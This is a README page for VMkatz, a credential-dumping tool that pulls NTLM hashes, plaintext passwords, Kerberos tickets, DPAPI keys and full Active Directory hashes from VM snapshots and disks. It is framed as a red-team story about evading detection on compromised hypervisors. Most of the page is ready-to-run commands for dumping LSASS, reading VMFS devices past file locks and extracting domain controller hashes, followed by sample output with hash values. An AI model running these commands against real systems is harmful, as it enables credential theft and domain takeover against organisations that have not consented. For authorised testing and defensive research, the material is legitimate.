VMkatz
Extract Windows credentials directly from VM memory snapshots and virtual disks
Install / Use
/learn @nikaiw/VMkatzREADME
VMkatz
Too Big to Steal
You are three weeks into a red team engagement. Your traffic crawls through a VPN, then bounces across four SOCKS proxies chained through compromised jump boxes before it touches the target network. Every packet takes the scenic route.
After days of lateral movement you land on a NAS attached to the virtualization cluster and the directory listing hits different: rows upon rows of .vmdk, .vmsn, .sav. Hundreds of gigabytes of virtual machines - domain controllers, admin workstations, the crown jewels - sitting right there.
But your link wheezes at 200 KB/s. Pulling a single 100 GB disk image would take six days, and every hour of sustained exfil is another chance the SOC spots the anomaly, burns your tunnel, and the whole chain collapses.
Without VMkatz, the traditional workflow looks like this: exfiltrate the entire VM disk or memory snapshot, mount it locally, install a full Windows analysis stack, load the snapshot into a debugger or use mimikatz on a booted copy, and manually piece together credentials from each VM - one at a time. Multiply that by a dozen VMs on the cluster and you are looking at days of bandwidth, tooling, and post-processing.
VMkatz exists because you shouldn't have to exfiltrate what you can read in place. It extracts Windows secrets - NTLM hashes, DPAPI master keys, Kerberos tickets, cached domain credentials, LSA secrets, NTDS.dit - directly from VM memory snapshots and virtual disks, on the NAS, the hypervisor, wherever the VM files are.
A single static binary, ~2.5 MB. Drop it on the ESXi host, the Proxmox node, or the NAS. Point it at a .vmsn, .vmdk, or an entire VM folder. Walk away with credentials, not disk images.
What It Extracts
From memory snapshots (LSASS)
All 9 SSP credential providers that mimikatz implements:
| Provider | Data | Notes |
| --- | --- | --- |
| MSV1_0 | NT/LM hashes, SHA1 | Physical-scan fallback for paged entries |
| WDigest | Plaintext passwords | Linked-list walk + .data fallback |
| Kerberos | AES/RC4/DES keys, tickets (.kirbi/.ccache) | AVL tree walk, often paged in VM snapshots |
| TsPkg | Plaintext passwords | RDP sessions only |
| DPAPI | Master key cache (GUID + decrypted key) | SHA1 masterkey for offline DPAPI decrypt |
| SSP | Plaintext credentials | SspCredentialList in msv1_0.dll |
| LiveSSP | Plaintext credentials | Requires livessp.dll (rare post-Win8) |
| Credman | Stored credentials | Hash-table + single-list enumeration |
| CloudAP | Azure AD tokens | Typically empty for local-only logon |
From virtual disks (offline)
- SAM hashes: Local account NT/LM hashes with account status (disabled, blank password)
- LSA secrets: Service account passwords, auto-logon credentials, machine account keys
- Cached domain credentials: DCC2 hashes (last N domain logons)
- DPAPI master keys: Hashcat-ready hashes from user master key files (
$DPAPImk$— modes 15300/15310/15900/15910 for local/domain users) - NTDS.dit: Full Active Directory hash extraction from domain controller disks, natively from the ESE database - no impacket or external tools needed
Supported Inputs
| Format | Extensions | Source | Status |
| --- | --- | --- | --- |
| VMware snapshots | .vmsn + .vmem | Workstation, ESXi | Tested |
| VMware embedded snapshots | .vmsn (no .vmem) | ESXi suspend / mainMem.useNamedFile=FALSE | Tested |
| VirtualBox saved states | .sav | VirtualBox | Tested |
| QEMU/KVM savevm states | auto-detected | Proxmox qm snapshot --vmstate, QEMU savevm | Tested |
| QEMU/KVM ELF core dumps | .elf | virsh dump, dump-guest-memory | Tested |
| Hyper-V saved states | .vmrs | Hyper-V 2016+ (native parser) | Untested |
| Hyper-V memory dumps | .bin, .raw | Legacy saved states, raw dumps | Untested |
| VMware virtual disks | .vmdk (sparse + flat) | Workstation, ESXi | Tested |
| VirtualBox virtual disks | .vdi | VirtualBox | Tested |
| QEMU/KVM virtual disks | .qcow2 | QEMU, Proxmox | Tested |
| Hyper-V virtual disks | .vhdx, .vhd | Hyper-V | Tested |
| VMFS-6 raw SCSI devices | /dev/disks/... | ESXi datastores (bypasses file locks) | Tested |
| LVM block devices | /dev/... | Proxmox LVM-thin, raw LVs | Tested |
| Raw registry hives | SAM, SYSTEM, SECURITY | Exported from disk or reg save | Tested |
| Raw NTDS.dit | ntds.dit + SYSTEM | Copied from domain controller | Tested |
| LSASS minidump | .dmp | --dump lsass, procdump, Task Manager | Tested |
| VM directories | any folder | Auto-discovers all processable files | Tested |
Target OS: Windows Server 2003 through Windows Server 2025 / Windows 11 24H2 (x86 PAE + x64, auto-detected).
Quick Start
# Build (default features: all hypervisors + disk + NTDS)
cargo build --release
# Extract LSASS credentials from a VMware snapshot
./vmkatz snapshot.vmsn
# Same, with pagefile resolution for paged-out creds
./vmkatz --disk disk.vmdk snapshot.vmsn
# Extract SAM/LSA/DCC2 from a virtual disk (auto-detected)
./vmkatz disk.vmdk
# Extract from raw registry hives (auto-detects SAM/SYSTEM/SECURITY)
./vmkatz SAM SYSTEM
./vmkatz SAM SYSTEM SECURITY
# Extract AD hashes from raw NTDS.dit + SYSTEM hive
./vmkatz ntds.dit SYSTEM
# Extract from VMFS-6 on ESXi (bypasses file locks on running VMs)
./vmkatz --vmfs-device /dev/disks/naa.xxx --vmdk 'MyVM/MyVM-flat.vmdk'
# List all VMs on a VMFS-6 datastore
./vmkatz --vmfs-device /dev/disks/naa.xxx --vmfs-list
# Extract from all VMs on a VMFS-6 datastore
./vmkatz --vmfs-device /dev/disks/naa.xxx
# Extract AD hashes from a domain controller disk (NTDS.dit)
./vmkatz --ntds /dev/pve/vm-102-disk-0
# Extract AD hashes with password history
./vmkatz --ntds --ntds-history dc-disk.qcow2
# Point at a VM folder and let it find everything
./vmkatz /path/to/vm-directory/
# List running processes
./vmkatz --list-processes snapshot.vmsn
# Dump LSASS as minidump (for pypykatz, etc.)
./vmkatz --dump lsass -o lsass.dmp snapshot.vmsn
# Output as hashcat-ready hashes (mode 1000)
./vmkatz --format hashcat snapshot.vmsn
# Output as NTLM pwdump format
./vmkatz --format ntlm snapshot.vmsn
# Export Kerberos tickets
./vmkatz --kirbi snapshot.vmsn # export as .kirbi files
./vmkatz --ccache snapshot.vmsn # export as .ccache file
# Extract from Proxmox VM savevm state (auto-detected QEVM format)
./vmkatz /dev/pve/vm-110-state-snapshot1
# Parse LSASS minidump
./vmkatz lsass.dmp
# Degraded extraction from truncated/partial memory
./vmkatz --carve partial-snapshot.vmsn
# Show all sessions including empty ones
./vmkatz --all snapshot.vmsn
Advanced options
# Recursively scan a directory tree for all VM files
./vmkatz -r /vmfs/volumes/datastore1/
# Filter to only snapshots or only disks in directory mode
./vmkatz --scan snapshot /path/to/vm/
./vmkatz --scan disk /path/to/vm/
# Filter output to specific providers
./vmkatz --provider msv,kerberos snapshot.vmsn
# Enable EPT scanning for VBS/Credential Guard VMs
./vmkatz --ept snapshot.vmsn
# Verbose output (memory regions, process list, debug info)
./vmkatz -v snapshot.vmsn
# Dump with custom Windows build number
./vmkatz --dump lsass --build 26100 -o lsass.dmp snapshot.vmsn
Output Formats
| Format | Flag | Description |
| --- | --- | --- |
| text | --format text (default) | Full credential dump with session metadata |
| brief | --format brief | Compact one-line-per-credential summary |
| ntlm | --format ntlm | DOMAIN\user:::hash::: pwdump format |
| hashcat | --format hashcat | Raw hashes: mode 1000 (NTLM), mode 2100 (DCC2), mode 15300/15900 (DPAPI) |
| csv | --format csv | Machine-readable, all fields |
In text mode, well-known blank password hashes (31d6cfe0... for NTLM, aad3b435... for LM) are annotated with (blank). SAM entries show account status: (DISABLED), (NO PASSWORD), (BLANK PASSWORD). DPAPI master keys are deduplicated to show only the most recent per user (use --all to see all keys).
Use --color auto|always|never to control colored terminal output (default: auto, detects TTY). Colors highlight usernames, section headers, interesting hashes, and plaintext passwords.
Example Output
LSASS extraction (default text)
$ vmkatz snapshot.vmsn
[*] Providers: MSV(ok) WDigest(ok) Kerberos(paged) TsPkg(empty) DPAPI(ok) SSP(empty) LiveSSP(n/a) Credman(empty) CloudAP(paged)
[+] 8 logon session(s), 3 with credentials:
LUID: 0x3e7 (SYSTEM)
Username: YOURPC$
Domain: WORKGROUP
[DPAPI]
GUID : 94e9f320-d4a0-4737-b34e-ab106f485c0e
MasterKey : d0f110675ca73f39d1370bdfd...
SHA1 MasterKey: ea72698de207dab9e01fd9ab63f322ae82b4a4bb
LUID: 0x240be
Session: 2 | LogonType: Unknown
Username: user
Domain: YOURPC
LogonServer: YOURPC
SID: S-1-5-21-4247878743-2693906039-1959858616-1000
[MSV1_0]
NT Hash : bbf7d1528afa8b0fdd40a5b2531bbb6d
SHA1 : 6ed12f1e60b17cfff120d753029314748b58aa05
DPAPI : 6ed12f1e60b17cfff120d753029314748b58aa05
Hashcat mode
$ vmkatz --format hashcat snapshot.vmsn
[*] Providers: MSV(ok) WDigest(ok) ...
bbf7d1528afa8b0fdd40a5b2531bbb6d
NTDS.dit extraction
$ vmkatz --ntds /dev/pve/vm-102-disk-0
[+] NTDS Artifacts:
Partition offset : 0x100000
ntds.dit size : 20971520 bytes
SYSTEM size : 14155776 bytes
Bootkey : 9ae365ba5244457bfc2a26187a28346a
Hashes extracted : 18
[+] AD NTLM Hashes:
RID: 500 Admini
Related Skills
node-connect
333.7kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
82.0kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
333.7kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
commit-push-pr
82.0kCommit, push, and open a PR
